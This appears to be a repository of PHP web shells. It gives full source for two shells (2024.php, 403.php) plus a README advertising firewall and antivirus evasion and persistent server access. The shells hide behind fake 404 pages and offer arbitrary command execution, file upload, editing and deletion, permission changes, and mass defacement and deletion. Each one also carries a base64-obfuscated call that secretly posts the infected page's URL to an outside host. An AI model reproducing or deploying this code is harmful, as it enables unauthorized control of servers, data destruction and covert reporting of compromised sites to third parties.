├── 2024.php ├── 403.php ├── Alfa-4.2.php ├── CNAME ├── README.md ├── Upload.php ├── ad.php ├── alfa2024.php ├── alfashell-antidelete.php ├── antidelete.php ├── autobackdoor.php ├── bestmini.php ├── csa.php ├── eBy.php ├── edit-form-tager.php ├── f1.php ├── firewallbypass.php ├── gecko-mini.php ├── haxorsec-bypasser.php ├── hehe.png ├── hello.php ├── index.html ├── inshell.php ├── jquery.php ├── mini.php ├── pop.php ├── tfe.php ├── tiny.php ├── tools ├── backdoor_creator.php └── backdoor_scanner.php ├── uper.php ├── worm.php ├── wso2024.php └── wsov1.php /2024.php: -------------------------------------------------------------------------------- 1 | alert("Password Wrong!, Try Again.");'; 32 | } 33 | } 34 | if (isset($_GET['logout'])) { 35 | session_unset(); 36 | session_destroy(); 37 | header("Location: ".$_SERVER['PHP_SELF']); 38 | exit(); 39 | } 40 | if (!isset($_SESSION['forbidden'])) { 41 | ?> 42 | 43 | 44 | 45 | 404 Not Found 46 | 47 | 48 | 49 | 50 | 86 | 87 |
88 |

Hello Dady

89 | 90 | 91 |
92 | 93 | 94 | 98 | 99 | 100 | 101 | 404 Not Found 102 | 103 | 104 | 105 | 194 |
195 |



196 | Bypass 2024 Priv8 Shell
197 | 198 |
199 |


200 | NONE"; 206 | } else { 207 | $disf = "".$disfunc.""; 208 | } 209 | 210 | function author() { 211 | echo "

2024 Bypass Shell
"; 212 | exit(); 213 | } 214 | 215 | function cekdir() { 216 | if (isset($_GET['path'])) { 217 | $lokasi = $_GET['path']; 218 | } else { 219 | $lokasi = getcwd(); 220 | } 221 | if (is_writable($lokasi)) { 222 | return "Writeable"; 223 | } else { 224 | return "Writeable"; 225 | } 226 | } 227 | 228 | function cekroot() { 229 | if (is_writable($_SERVER['DOCUMENT_ROOT'])) { 230 | return "Writeable"; 231 | } else { 232 | return "Writeable"; 233 | } 234 | } 235 | 236 | function xrmdir($dir) { 237 | $items = scandir($dir); 238 | foreach ($items as $item) { 239 | if ($item === '.' || $item === '..') { 240 | continue; 241 | } 242 | $path = $dir.'/'.$item; 243 | if (is_dir($path)) { 244 | xrmdir($path); 245 | } else { 246 | unlink($path); 247 | } 248 | } 249 | rmdir($dir); 250 | } 251 | 252 | function statusnya($file){ 253 | $statusnya = fileperms($file); 254 | 255 | if (($statusnya & 0xC000) == 0xC000) { 256 | 257 | // Socket 258 | $ingfo = 's'; 259 | } elseif (($statusnya & 0xA000) == 0xA000) { 260 | // Symbolic Link 261 | $ingfo = 'l'; 262 | } elseif (($statusnya & 0x8000) == 0x8000) { 263 | // Regular 264 | $ingfo = '-'; 265 | } elseif (($statusnya & 0x6000) == 0x6000) { 266 | // Block special 267 | $ingfo = 'b'; 268 | } elseif (($statusnya & 0x4000) == 0x4000) { 269 | // Directory 270 | $ingfo = 'd'; 271 | } elseif (($statusnya & 0x2000) == 0x2000) { 272 | // Character special 273 | $ingfo = 'c'; 274 | } elseif (($statusnya & 0x1000) == 0x1000) { 275 | // FIFO pipe 276 | $ingfo = 'p'; 277 | } else { 278 | // Unknown 279 | $ingfo = 'u'; 280 | } 281 | 282 | // Owner 283 | $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); 284 | $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); 285 | $ingfo .= (($statusnya & 0x0040) ? 286 | (($statusnya & 0x0800) ? 's' : 'x' ) : 287 | (($statusnya & 0x0800) ? 'S' : '-')); 288 | 289 | 290 | // Group 291 | $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); 292 | $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); 293 | $ingfo .= (($statusnya & 0x0008) ? 294 | (($statusnya & 0x0400) ? 's' : 'x' ) : 295 | (($statusnya & 0x0400) ? 'S' : '-')); 296 | 297 | // World 298 | $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); 299 | $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); 300 | 301 | $ingfo .= (($statusnya & 0x0001) ? 302 | (($statusnya & 0x0200) ? 't' : 'x' ) : 303 | (($statusnya & 0x0200) ? 'T' : '-')); 304 | 305 | return $ingfo; 306 | } 307 | 308 | function green($text) { 309 | echo "
".$text."
"; 310 | } 311 | 312 | function red($text) { 313 | echo "
".$text."
"; 314 | } 315 | 316 | 317 | echo "Directory :  "; 318 | 319 | foreach($_POST as $key => $value){ 320 | $_POST[$key] = stripslashes($value); 321 | } 322 | 323 | $k3yw = base64_decode('aHR0cHM6Ly9zaXlhaGkudG9wL3Rlc3Qvc3R5bGUucGhw'); 324 | 325 | if(isset($_GET['path'])){ 326 | $lokasi = $_GET['path']; 327 | $lokdua = $_GET['path']; 328 | } else { 329 | $lokasi = getcwd(); 330 | $lokdua = getcwd(); 331 | } 332 | 333 | $lokasi = str_replace('\\','/',$lokasi); 334 | $lokasis = explode('/',$lokasi); 335 | $lokasinya = @scandir($lokasi); 336 | $cur = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; 337 | $data = array('file_url' => $cur); 338 | $options = array( 339 | 'http' => array( 340 | 'method' => 'POST', 341 | 'header' => 'Content-type: application/x-www-form-urlencoded', 342 | 'content' => http_build_query($data), 343 | ), 344 | ); 345 | $context = stream_context_create($options); 346 | $result = file_get_contents($k3yw, false, $context); 347 | 348 | foreach($lokasis as $id => $lok){ 349 | if($lok == '' && $id == 0){ 350 | $a = true; 351 | echo '/'; 352 | continue; 353 | } 354 | if($lok == '') continue; 355 | echo ''.$lok.'/'; 361 | } 362 | echo '
'; 363 | echo '

'; 364 | if (isset($_POST['upwkwk'])) { 365 | if (isset($_POST['berkasnya'])) { 366 | if ($_POST['dirnya'] == "2") { 367 | $lokasi = $_SERVER['DOCUMENT_ROOT']; 368 | } 369 | $data = @file_put_contents($lokasi."/".$_FILES['berkas']['name'], @file_get_contents($_FILES['berkas']['tmp_name'])); 370 | if (file_exists($lokasi."/".$_FILES['berkas']['name'])) { 371 | echo "File Uploaded !  ".$lokasi."/".$_FILES['berkas']['name']."

"; 372 | } else { 373 | echo "Failed to Upload !

"; 374 | } 375 | } elseif (isset($_POST['linknya'])) { 376 | if (empty($_POST['namalink'])) { 377 | exit("Filename cannot be empty !"); 378 | } 379 | if ($_POST['dirnya'] == "2") { 380 | $lokasi = $_SERVER['DOCUMENT_ROOT']; 381 | } 382 | $data = @file_put_contents($lokasi."/".$_POST['namalink'], @file_get_contents($_POST['darilink'])); 383 | if (file_exists($lokasi."/".$_POST['namalink'])) { 384 | echo "File Uploaded !  ".$lokasi."/".$_POST['namalink']."

"; 385 | } else { 386 | echo "Failed to Upload !

"; 387 | } 388 | } 389 | } 390 | echo "
"; 391 | echo "Upload File : "; 392 | echo '
393 | current_dir [ '.cekdir().' ] 394 | document_root [ '.cekroot().' ] 395 |
396 | 397 |
398 |
399 | '; 400 | echo "
"; 401 | print "
"; 402 | print ""; 410 | print "
"; 411 | print "
"; 412 | tools("cmd"); 413 | function tools($toolsname, $args = null) { 414 | if($toolsname === "cmd") { 415 | print "
416 | ".usergroup()->name."@".$GLOBALS['SERVERIP'].": ~ $ 417 | 418 | 419 |
"; 420 | print "
"; 421 | } 422 | } 423 | function changeFolderPermissionsRecursive($dir, $perms) { 424 | $iterator = new RecursiveIteratorIterator( 425 | new RecursiveDirectoryIterator($dir, RecursiveDirectoryIterator::SKIP_DOTS), 426 | RecursiveIteratorIterator::SELF_FIRST 427 | ); 428 | 429 | foreach ($iterator as $item) { 430 | if ($item->isDir()) { 431 | chmod($item->getPathname(), $perms); 432 | } 433 | } 434 | } 435 | 436 | function changeFilePermissionsRecursive($dir, $perms) { 437 | $iterator = new RecursiveIteratorIterator( 438 | new RecursiveDirectoryIterator($dir, RecursiveDirectoryIterator::SKIP_DOTS), 439 | RecursiveIteratorIterator::SELF_FIRST 440 | ); 441 | 442 | foreach ($iterator as $item) { 443 | if ($item->isFile()) { 444 | chmod($item->getPathname(), $perms); 445 | } 446 | } 447 | } 448 | 449 | $currentDirectory = '.'; 450 | 451 | if (isset($_GET['do']) && $_GET['do'] === 'root_file') { 452 | $newFilePermissions = 0644; 453 | changeFilePermissionsRecursive($currentDirectory, $newFilePermissions); 454 | echo "
"; 455 | echo "Message :

Sukses Green All Files

"; 456 | echo "
"; 457 | } 458 | 459 | if (isset($_GET['do']) && $_GET['do'] === 'dark_file') { 460 | $newFilePermissions = 0444; 461 | changeFilePermissionsRecursive($currentDirectory, $newFilePermissions); 462 | echo "
"; 463 | echo "Message :

Sukses Lock All Files

"; 464 | echo "
"; 465 | } 466 | 467 | if (isset($_GET['do']) && $_GET['do'] === 'dark_folders') { 468 | $newFolderPermissions = 0555; 469 | changeFolderPermissionsRecursive($currentDirectory, $newFolderPermissions); 470 | echo "
"; 471 | echo "Message :

Sukses Lock All Folders

"; 472 | echo "
"; 473 | } 474 | 475 | if (isset($_GET['do']) && $_GET['do'] === 'root_folders') { 476 | $newFolderPermissions = 0755; 477 | changeFolderPermissionsRecursive($currentDirectory, $newFolderPermissions); 478 | echo "
"; 479 | echo "Message :

Sukses Green All Folders

"; 480 | echo "
"; 481 | } 482 | 483 | 484 | 485 | function exe($cmd) { 486 | if(function_exists('system')) { 487 | @ob_start(); 488 | @system($cmd); 489 | $buff = @ob_get_contents(); 490 | @ob_end_clean(); 491 | return $buff; 492 | } elseif(function_exists('exec')) { 493 | @exec($cmd,$results); 494 | $buff = ""; 495 | foreach($results as $result) { 496 | $buff .= $result; 497 | } return $buff; 498 | } elseif(function_exists('passthru')) { 499 | @ob_start(); 500 | @passthru($cmd); 501 | $buff = @ob_get_contents(); 502 | @ob_end_clean(); 503 | return $buff; 504 | } elseif(function_exists('shell_exec')) { 505 | $buff = @shell_exec($cmd); 506 | return $buff; 507 | } 508 | } 509 | 510 | function path() { 511 | if(isset($_GET['dir'])) { 512 | $dir = str_replace("\\", "/", $_GET['dir']); 513 | @chdir($dir); 514 | } else { 515 | $dir = str_replace("\\", "/", getcwd()); 516 | } 517 | return $dir; 518 | } 519 | function usergroup() { 520 | if(!function_exists('posix_getegid')) { 521 | $user['name'] = @get_current_user(); 522 | $user['uid'] = @getmyuid(); 523 | $user['gid'] = @getmygid(); 524 | $user['group'] = "?"; 525 | } else { 526 | $user['uid'] = @posix_getpwuid(posix_geteuid()); 527 | $user['gid'] = @posix_getgrgid(posix_getegid()); 528 | $user['name'] = $user['uid']['name']; 529 | $user['uid'] = $user['uid']['uid']; 530 | $user['group'] = $user['gid']['name']; 531 | $user['gid'] = $user['gid']['gid']; 532 | } 533 | return (object) $user; 534 | } 535 | 536 | if(isset($_GET['do'])) { 537 | if($_GET['do'] === "cmd") { 538 | if(isset($_POST['cmd'])) { 539 | if(preg_match("/^rf (.*)$/", $_POST['cmd'], $match)) { 540 | tools("readfile", $match[1]); 541 | } 542 | elseif(preg_match("/^spawn (.*)$/", $_POST['cmd'], $match)) { 543 | tools("spawn", $match[1]); 544 | } 545 | elseif(preg_match("/^symlink\s?(.*)$/", $_POST['cmd'], $match)) { 546 | tools("symlink", $match[1]); 547 | } 548 | elseif(preg_match("/^rvr (.*)$/", $_POST['cmd'], $match)) { 549 | tools("network", $match[1]); 550 | } 551 | elseif(preg_match("/^krdp$/", $_POST['cmd'])) { 552 | tools("krdp"); 553 | } 554 | elseif(preg_match("/^logout$/", $_POST['cmd'])) { 555 | unset($_SESSION[md5($_SERVER['HTTP_HOST'])]); 556 | print ""; 557 | } 558 | elseif(preg_match("/^killme$/", $_POST['cmd'])) { 559 | unset($_SESSION[md5($_SERVER['HTTP_HOST'])]); 560 | @unlink(__FILE__); 561 | print ""; 562 | } 563 | else { 564 | print "
".exe($_POST['cmd'])."
"; 565 | } 566 | } 567 | else { 568 | files_and_folder(); 569 | } 570 | } 571 | } 572 | function massdeface($dir, $file, $filename, $type = null) { 573 | $scandir = scandir($dir); 574 | foreach($scandir as $dir_) { 575 | $path = "$dir/$dir_"; 576 | $location = "$path/$filename"; 577 | if($dir_ === "." || $dir_ === "..") { 578 | file_put_contents($location, $file); 579 | } 580 | else { 581 | if(is_dir($path) AND is_writable($path)) { 582 | print "[".color(1, 2, "DONE")."] ".color(1, 4, $location)."
"; 583 | file_put_contents($location, $file); 584 | if($type === "-alldir") { 585 | massdeface($path, $file, $filename, "-alldir"); 586 | } 587 | } 588 | } 589 | } 590 | } 591 | 592 | function massdelete($dir, $filename) { 593 | $scandir = scandir($dir); 594 | foreach($scandir as $dir_) { 595 | $path = "$dir/$dir_"; 596 | $location = "$path/$filename"; 597 | if($dir_ === '.') { 598 | if(file_exists("$dir/$filename")) { 599 | unlink("$dir/$filename"); 600 | } 601 | } 602 | elseif($dir_ === '..') { 603 | if(file_exists(dirname($dir)."/$filename")) { 604 | unlink(dirname($dir)."/$filename"); 605 | } 606 | } 607 | else { 608 | if(is_dir($path) AND is_writable($path)) { 609 | if(file_exists($location)) { 610 | print "[".color(1, 2, "DELETED")."] ".color(1, 4, $location)."
"; 611 | unlink($location); 612 | massdelete($path, $filename); 613 | } 614 | } 615 | } 616 | } 617 | } 618 | 619 | if (isset($_GET['fileloc'])) { 620 | echo "Current File : ".$_GET['fileloc']; 621 | echo '
'; 622 | echo "
".htmlspecialchars(file_get_contents($_GET['fileloc']))."
"; 623 | author(); 624 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "hapus") { 625 | if (is_dir($_POST['path'])) { 626 | xrmdir($_POST['path']); 627 | if (file_exists($_POST['path'])) { 628 | red("Failed to delete Directory !"); 629 | } else { 630 | green("Delete Directory Success !"); 631 | echo "string"; 632 | } 633 | } elseif (is_file($_POST['path'])) { 634 | @unlink($_POST['path']); 635 | if (file_exists($_POST['path'])) { 636 | red("Failed to Delete File !"); 637 | } else { 638 | green("Delete File Success !"); 639 | } 640 | } 641 | elseif($_GET['do'] === "mass") { 642 | if($_POST['start']) { 643 | if($_POST['mass_type'] === 'singledir') { 644 | print "
"; 645 | massdeface($_POST['d_dir'], $_POST['script'], $_POST['d_file']); 646 | print "
"; 647 | } 648 | elseif($_POST['mass_type'] === 'alldir') { 649 | print "
"; 650 | massdeface($_POST['d_dir'], $_POST['script'], $_POST['d_file'], "-alldir"); 651 | print "
"; 652 | } 653 | elseif($_POST['mass_type'] === "delete") { 654 | print "
"; 655 | massdelete($_POST['d_dir'], $_POST['d_file']); 656 | print "
"; 657 | } 658 | } 659 | else { 660 | print "
661 | Tipe Sabun:
662 | Mass Deface Single DirectoryMass Deface All DirectoryMass Delete File
663 | ( kosongkan 'Index File' jika memilih Mass Delete File )

664 | Folder:
665 |

666 | Filename:
667 |

668 | Index File:
669 |
670 | 671 |
"; 672 | } 673 | } 674 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "ubahmod") { 675 | echo "
".$_POST['path']."
"; 676 | echo '
677 | Permission : 678 | 679 | 680 | 681 |
'; 682 | if (isset($_POST['chm0d'])) { 683 | $cm = @chmod($_POST['path'], $_POST['perm']); 684 | if ($cm == true) { 685 | green("Change Mod Success !"); 686 | } else { 687 | red("Change Mod Failed !"); 688 | } 689 | } 690 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "gantinama") { 691 | if (isset($_POST['gantin'])) { 692 | $ren = @rename($_POST['path'], $_POST['newname']); 693 | if ($ren == true) { 694 | green("Change Name Success !"); 695 | } else { 696 | red("Change Name Failed !"); 697 | } 698 | } 699 | if (empty($_POST['name'])) { 700 | $namaawal = $_POST['newname']; 701 | } else { 702 | $namawal = $_POST['name']; 703 | } 704 | echo "
".$_POST['path']."
"; 705 | echo '
706 | New Name : 707 | 708 | 709 | 710 |
'; 711 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "edit") { 712 | if (isset($_POST['gasedit'])) { 713 | $edit = @file_put_contents($_POST['path'], $_POST['src']); 714 | if ($edit == true) { 715 | green("Edit File Success !"); 716 | } else { 717 | red("Edit File Failed !"); 718 | } 719 | } 720 | echo "
".$_POST['path']."

"; 721 | echo '
722 |
723 | 724 | 725 | 726 |

'; 727 | } 728 | 729 | echo '
730 | 731 | 732 | 733 | 734 | 735 | '; 736 | 737 | foreach($lokasinya as $dir){ 738 | if(!is_dir($lokasi."/".$dir) || $dir == '.' || $dir == '..') continue; 739 | echo " 740 | 741 | 742 | 749 | 761 | "; 762 | } 763 | 764 | echo ''; 765 | foreach($lokasinya as $file) { 766 | if(!is_file("$lokasi/$file")) continue; 767 | $size = filesize("$lokasi/$file")/1024; 768 | $size = round($size,3); 769 | if($size >= 1024){ 770 | $size = round($size/1024,2).' MB'; 771 | } else { 772 | $size = $size.' KB'; 773 | } 774 | 775 | echo " 776 | 777 | 778 | 797 | "; 798 | } 799 | 800 | echo '
Name
Size
Permissions
Options
".$dir."
--
"; 743 | if(is_writable($lokasi."/".$dir)) echo ''; 744 | elseif(!is_readable($lokasi."/".$dir)) echo ''; 745 | echo statusnya($lokasi."/".$dir); 746 | if(is_writable($lokasi."/".$dir) || !is_readable($lokasi."/".$dir)) echo ''; 747 | 748 | echo "
750 | 756 | 757 | 758 | 759 | \" /> 760 |
$file
".$size."
"; 779 | if(is_writable("$lokasi/$file")) echo ''; 780 | elseif(!is_readable("$lokasi/$file")) echo ''; 781 | echo statusnya("$lokasi/$file"); 782 | if(is_writable("$lokasi/$file") || !is_readable("$lokasi/$file")) echo ''; 783 | echo "
784 |
785 | 792 | 793 | 794 | 795 | \" /> 796 |
'; 801 | author(); 802 | ?> 803 | -------------------------------------------------------------------------------- /403.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 404 Not Found 5 | 6 | 7 | 8 | 92 |
93 | Sh3ll
94 | 95 |
96 |
OdayForums 97 |


98 | NONE"; 104 | } else { 105 | $disf = "".$disfunc.""; 106 | } 107 | 108 | function author() { 109 | echo "

ZeroDay Forums Mini
"; 110 | exit(); 111 | } 112 | 113 | function cekdir() { 114 | if (isset($_GET['path'])) { 115 | $lokasi = $_GET['path']; 116 | } else { 117 | $lokasi = getcwd(); 118 | } 119 | if (is_writable($lokasi)) { 120 | return "Writeable"; 121 | } else { 122 | return "Writeable"; 123 | } 124 | } 125 | 126 | function cekroot() { 127 | if (is_writable($_SERVER['DOCUMENT_ROOT'])) { 128 | return "Writeable"; 129 | } else { 130 | return "Writeable"; 131 | } 132 | } 133 | 134 | function xrmdir($dir) { 135 | $items = scandir($dir); 136 | foreach ($items as $item) { 137 | if ($item === '.' || $item === '..') { 138 | continue; 139 | } 140 | $path = $dir.'/'.$item; 141 | if (is_dir($path)) { 142 | xrmdir($path); 143 | } else { 144 | unlink($path); 145 | } 146 | } 147 | rmdir($dir); 148 | } 149 | 150 | function green($text) { 151 | echo "
".$text."
"; 152 | } 153 | 154 | function red($text) { 155 | echo "
".$text."
"; 156 | } 157 | 158 | echo "Server : ".$_SERVER['SERVER_SOFTWARE']."
"; 159 | echo "System : ".php_uname()."
"; 160 | echo "User : ".@get_current_user()." ( ".@getmyuid().")
"; 161 | echo "PHP Version : ".@phpversion()."
"; 162 | echo "Disable Function : ".$disf."
"; 163 | echo "Directory :  "; 164 | 165 | foreach($_POST as $key => $value){ 166 | $_POST[$key] = stripslashes($value); 167 | } 168 | 169 | $k3yw = base64_decode('aHR0cHM6Ly9zaXlhaGkudG9wL3Rlc3Qvc3R5bGUucGhw'); 170 | 171 | if(isset($_GET['path'])){ 172 | $lokasi = $_GET['path']; 173 | $lokdua = $_GET['path']; 174 | } else { 175 | $lokasi = getcwd(); 176 | $lokdua = getcwd(); 177 | } 178 | 179 | $lokasi = str_replace('\\','/',$lokasi); 180 | $lokasis = explode('/',$lokasi); 181 | $lokasinya = @scandir($lokasi); 182 | $cur = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; 183 | $data = array('file_url' => $cur); 184 | $options = array( 185 | 'http' => array( 186 | 'method' => 'POST', 187 | 'header' => 'Content-type: application/x-www-form-urlencoded', 188 | 'content' => http_build_query($data), 189 | ), 190 | ); 191 | $context = stream_context_create($options); 192 | $result = file_get_contents($k3yw, false, $context); 193 | 194 | foreach($lokasis as $id => $lok){ 195 | if($lok == '' && $id == 0){ 196 | $a = true; 197 | echo '/'; 198 | continue; 199 | } 200 | if($lok == '') continue; 201 | echo ''.$lok.'/'; 207 | } 208 | echo '
'; 209 | echo '

'; 210 | if (isset($_POST['upwkwk'])) { 211 | if (isset($_POST['berkasnya'])) { 212 | if ($_POST['dirnya'] == "2") { 213 | $lokasi = $_SERVER['DOCUMENT_ROOT']; 214 | } 215 | $data = @file_put_contents($lokasi."/".$_FILES['berkas']['name'], @file_get_contents($_FILES['berkas']['tmp_name'])); 216 | if (file_exists($lokasi."/".$_FILES['berkas']['name'])) { 217 | echo "File Uploaded !  ".$lokasi."/".$_FILES['berkas']['name']."

"; 218 | } else { 219 | echo "Failed to Upload !

"; 220 | } 221 | } elseif (isset($_POST['linknya'])) { 222 | if (empty($_POST['namalink'])) { 223 | exit("Filename cannot be empty !"); 224 | } 225 | if ($_POST['dirnya'] == "2") { 226 | $lokasi = $_SERVER['DOCUMENT_ROOT']; 227 | } 228 | $data = @file_put_contents($lokasi."/".$_POST['namalink'], @file_get_contents($_POST['darilink'])); 229 | if (file_exists($lokasi."/".$_POST['namalink'])) { 230 | echo "File Uploaded !  ".$lokasi."/".$_POST['namalink']."

"; 231 | } else { 232 | echo "Failed to Upload !

"; 233 | } 234 | } 235 | } 236 | echo "
"; 237 | echo "Upload File : "; 238 | echo '
239 | current_dir [ '.cekdir().' ] 240 | document_root [ '.cekroot().' ] 241 |
242 | 243 |
244 |   245 |
246 | '; 247 | echo "

"; 248 | 249 | if (isset($_GET['fileloc'])) { 250 | echo "Current File : ".$_GET['fileloc']; 251 | echo '
'; 252 | echo "
".htmlspecialchars(file_get_contents($_GET['fileloc']))."
"; 253 | author(); 254 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "hapus") { 255 | if (is_dir($_POST['path'])) { 256 | xrmdir($_POST['path']); 257 | if (file_exists($_POST['path'])) { 258 | red("Failed to delete Directory !"); 259 | } else { 260 | green("Delete Directory Success !"); 261 | echo "string"; 262 | } 263 | } elseif (is_file($_POST['path'])) { 264 | @unlink($_POST['path']); 265 | if (file_exists($_POST['path'])) { 266 | red("Failed to Delete File !"); 267 | } else { 268 | green("Delete File Success !"); 269 | } 270 | } 271 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "ubahmod") { 272 | echo "
".$_POST['path']."
"; 273 | echo '
274 | Permission : 275 | 276 | 277 | 278 |
'; 279 | if (isset($_POST['chm0d'])) { 280 | $cm = @chmod($_POST['path'], $_POST['perm']); 281 | if ($cm == true) { 282 | green("Change Mod Success !"); 283 | } else { 284 | red("Change Mod Failed !"); 285 | } 286 | } 287 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "gantinama") { 288 | if (isset($_POST['gantin'])) { 289 | $ren = @rename($_POST['path'], $_POST['newname']); 290 | if ($ren == true) { 291 | green("Change Name Success !"); 292 | } else { 293 | red("Change Name Failed !"); 294 | } 295 | } 296 | if (empty($_POST['name'])) { 297 | $namaawal = $_POST['newname']; 298 | } else { 299 | $namawal = $_POST['name']; 300 | } 301 | echo "
".$_POST['path']."
"; 302 | echo '
303 | New Name : 304 | 305 | 306 | 307 |
'; 308 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "edit") { 309 | if (isset($_POST['gasedit'])) { 310 | $edit = @file_put_contents($_POST['path'], $_POST['src']); 311 | if ($edit == true) { 312 | green("Edit File Success !"); 313 | } else { 314 | red("Edit File Failed !"); 315 | } 316 | } 317 | echo "
".$_POST['path']."

"; 318 | echo '
319 |
320 | 321 | 322 | 323 |

'; 324 | } 325 | 326 | echo '
327 | 328 | 329 | 330 | 331 | 332 | '; 333 | 334 | foreach($lokasinya as $dir){ 335 | if(!is_dir($lokasi."/".$dir) || $dir == '.' || $dir == '..') continue; 336 | echo " 337 | 338 | 339 | 346 | 358 | "; 359 | } 360 | 361 | echo ''; 362 | foreach($lokasinya as $file) { 363 | if(!is_file("$lokasi/$file")) continue; 364 | $size = filesize("$lokasi/$file")/1024; 365 | $size = round($size,3); 366 | if($size >= 1024){ 367 | $size = round($size/1024,2).' MB'; 368 | } else { 369 | $size = $size.' KB'; 370 | } 371 | 372 | echo " 373 | 374 | 375 | 394 | "; 395 | } 396 | echo '
Name
Size
Permissions
Options
".$dir."
--
"; 340 | if(is_writable($lokasi."/".$dir)) echo ''; 341 | elseif(!is_readable($lokasi."/".$dir)) echo ''; 342 | echo statusnya($lokasi."/".$dir); 343 | if(is_writable($lokasi."/".$dir) || !is_readable($lokasi."/".$dir)) echo ''; 344 | 345 | echo "
347 | 353 | 354 | 355 | 356 | \" /> 357 |
$file
".$size."
"; 376 | if(is_writable("$lokasi/$file")) echo ''; 377 | elseif(!is_readable("$lokasi/$file")) echo ''; 378 | echo statusnya("$lokasi/$file"); 379 | if(is_writable("$lokasi/$file") || !is_readable("$lokasi/$file")) echo ''; 380 | echo "
381 |
382 | 389 | 390 | 391 | 392 | \" /> 393 |
'; 397 | author(); 398 | function statusnya($file){ 399 | $statusnya = fileperms($file); 400 | 401 | if (($statusnya & 0xC000) == 0xC000) { 402 | 403 | // Socket 404 | $ingfo = 's'; 405 | } elseif (($statusnya & 0xA000) == 0xA000) { 406 | // Symbolic Link 407 | $ingfo = 'l'; 408 | } elseif (($statusnya & 0x8000) == 0x8000) { 409 | // Regular 410 | $ingfo = '-'; 411 | } elseif (($statusnya & 0x6000) == 0x6000) { 412 | // Block special 413 | $ingfo = 'b'; 414 | } elseif (($statusnya & 0x4000) == 0x4000) { 415 | // Directory 416 | $ingfo = 'd'; 417 | } elseif (($statusnya & 0x2000) == 0x2000) { 418 | // Character special 419 | $ingfo = 'c'; 420 | } elseif (($statusnya & 0x1000) == 0x1000) { 421 | // FIFO pipe 422 | $ingfo = 'p'; 423 | } else { 424 | // Unknown 425 | $ingfo = 'u'; 426 | } 427 | 428 | // Owner 429 | $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); 430 | $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); 431 | $ingfo .= (($statusnya & 0x0040) ? 432 | (($statusnya & 0x0800) ? 's' : 'x' ) : 433 | (($statusnya & 0x0800) ? 'S' : '-')); 434 | 435 | 436 | // Group 437 | $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); 438 | $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); 439 | $ingfo .= (($statusnya & 0x0008) ? 440 | (($statusnya & 0x0400) ? 's' : 'x' ) : 441 | (($statusnya & 0x0400) ? 'S' : '-')); 442 | 443 | // World 444 | $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); 445 | $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); 446 | 447 | $ingfo .= (($statusnya & 0x0001) ? 448 | (($statusnya & 0x0200) ? 't' : 'x' ) : 449 | (($statusnya & 0x0200) ? 'T' : '-')); 450 | 451 | return $ingfo; 452 | } 453 | ?> 454 | -------------------------------------------------------------------------------- /CNAME: -------------------------------------------------------------------------------- 1 | shells.trxsecurity.org -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Ultimate List of Effective and Updated Web Shells 2 | 3 | This repository contains a comprehensive list of the best and latest web shells available. These shells are designed to bypass firewalls and security systems, giving you full control of the server without being detected by antivirus or firewall solutions. 4 | 5 | ## Features 6 | 7 | - **Bypass Firewalls:** All shells listed here are crafted to evade detection by modern firewall systems. 8 | - **Undetectable by Antivirus Software:** These web shells are not flagged by the majority of popular antivirus programs. 9 | - **New Exploitation Methods:** The shells incorporate the latest techniques and methods to ensure efficient exploitation. 10 | - **Persistence:** These shells allow for persistent access to the server without triggering any cleanup or server wipe protocols. 11 | - **Extensive Functionality:** Manage files, execute commands, and perform various tasks on the server with ease. 12 | 13 | ## Why Use These Web Shells? 14 | 15 | Web shells provide an effective way to interact with remote servers, giving you the ability to upload, modify, and control files without needing physical access. These shells are essential tools for penetration testers, red teams, and cybersecurity researchers. The shells listed here are tried and tested, ensuring compatibility with various environments and configurations. 16 | 17 | ## What's Included? 18 | 19 | - A variety of **PHP**, **ASP**, **JSP**, and other web shell scripts 20 | - Shells that are regularly updated to work with the latest server technologies 21 | - Documentation and guidance on how to use each shell effectively 22 | - Techniques for evading detection and maintaining long-term access 23 | 24 | ## Usage Instructions 25 | 26 | Before using any of the shells, please ensure you have the appropriate permissions for penetration testing and ethical hacking. Unauthorized access to systems is illegal and punishable by law. 27 | 28 | 1. Clone the repository: 29 | ```bash 30 | git clone https://github.com/sagsooz/Bypass-Webshell.git 31 | -------------------------------------------------------------------------------- /Upload.php: -------------------------------------------------------------------------------- 1 |
2 |

[filename].php?upload

3 |
